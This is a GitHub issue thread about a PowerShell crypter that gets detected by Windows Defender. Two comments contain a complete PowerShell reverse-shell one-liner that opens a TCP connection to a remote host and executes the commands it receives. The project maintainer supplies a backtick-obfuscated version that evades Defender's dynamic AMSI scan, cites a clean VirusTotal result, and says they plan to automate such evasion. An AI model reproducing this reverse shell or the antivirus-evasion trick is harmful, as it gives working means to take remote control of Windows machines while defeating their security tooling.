### ISSUE TITLE
Detected by Windows Defender

### ISSUE THREAD

**Issue by Koovu** [the-xentropy/xencrypt#2] opened 2020-02-14 14:15 UTC
Is this still working for you?

I've used your script to encrypt/obfuscate a PowerShell Reverse Shell script, and upon trying to run the encrypted script I receive the "Blocked due to malicious code" while Windows Defender is active.

**Comment by the-xentropy** [comment] 2020-02-14 14:21
Yeah, I test it regularly and it works for me. Can you try re generating the output script and see if you get the same detection? Every run generates a unique script, and unfortunately as this is not the only crypter in existence that means it can sometimes generate outputs that are similar to known ones.

Otherwise, if you can let me know what input script you're using I can do more detailed digging.

**Comment by Koovu** [comment] 2020-02-14 14:32
Ah strange. I've tried a handful of regenerations, including upping the itterations to 500, but always get the same result. 
This was tested on a Windows 10 1909 build, with current live Windows Defener definitions. 

The input I was using was:
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

**Comment by the-xentropy** [comment] 2020-02-14 16:20
Awesome, thanks. I'll get around to testing this later this evening. Will keep you posted. :)

**Comment by the-xentropy** [comment] 2020-02-14 22:11
I can replicate the issue, but it's only happening on some cases so I'm going to have to investigate the root cause over the weekend. Thanks for reporting this. 👍

**Comment by Koovu** [comment] 2020-02-14 22:17
Awesome thanks buddy!
I wonder if it's a certain padding mode or cypher mode that's making it detectable, tbh I haven't altered your script it any way to try testing this

**Comment by the-xentropy** [comment] 2020-02-14 22:18
Nope, it's successfully bypassing static detection as you can tell from scanning it over at VirusTotal (reports 0/57), it's getting caught in the dynamic detection phase so I'm going to have to investigate how to beat that more reliably. :D

**Comment by the-xentropy** [comment] 2020-02-14 22:46
It's definitely getting detected on the dynamic execution phase as it is. If you want a temporary work-around you can trivially obfuscate your input script. I went ahead and did it for you by inserting a single backtick (can't believe that was enough) into the string that was making it get detected so you can use that payload if you want:

```
$client = New-Object System.Net.Sock`ets.TCPClient("127.0.0.1",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```

**Comment by Koovu** [comment] 2020-02-15 23:28
hah brilliant, can't believe that simple tick allows it to go through! Thanks bud!

**Comment by the-xentropy** [comment] 2020-02-16 00:48
No problem! Feel free to open another issue if you encounter any further issues. I'm gonna close this issue as I'm going to try to implement an automated way to obfuscate the input script a bit to get around this dumb dynamic AMSI layer. :)

**Closed by the-xentropy** 2020-02-16 00:48 UTC
Labels: question
